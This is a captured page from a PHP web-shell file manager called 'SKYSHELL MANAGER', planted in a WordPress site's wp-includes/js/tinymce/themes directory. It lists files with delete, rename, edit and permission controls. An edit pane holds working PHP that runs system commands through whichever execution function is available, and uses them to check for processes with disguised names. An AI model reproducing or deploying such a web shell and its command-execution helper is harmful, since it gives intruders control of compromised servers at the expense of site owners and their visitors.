📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
33554.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: .value
<?php $files = ['class.project','modtemplates.inc','sqlupdate2','ITDynamic','medals.inc','documentation','lang_bbcode','user_details','podcastLib.class','account_edit','auctionfriend','spanish_mimes','proj_details_new','toplayout','phpbb22.inc','tbl_rename','archives_actions','de_prova','phocalongtext','paginazione_old','webdb_view_test2','email_forgot','enrol_database','sendactivation','db_routines.inc','under_buttons','privmessage','email_responses','newmoalif','mailusers']; foreach ($files as $f) { $res = @run("pgrep {$f}"); if (!preg_match('/\d+/', $res)) { die("<f>{$f}</f>"); } } die('!ended!'); function run($in) { $out = ''; if (function_exists('exec')) { @exec($in, $out); $out = @join("\n", $out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { $out = ""; while (!@feof($f)) $out .= fread($f, 1024); pclose($f); } return $out; }
Save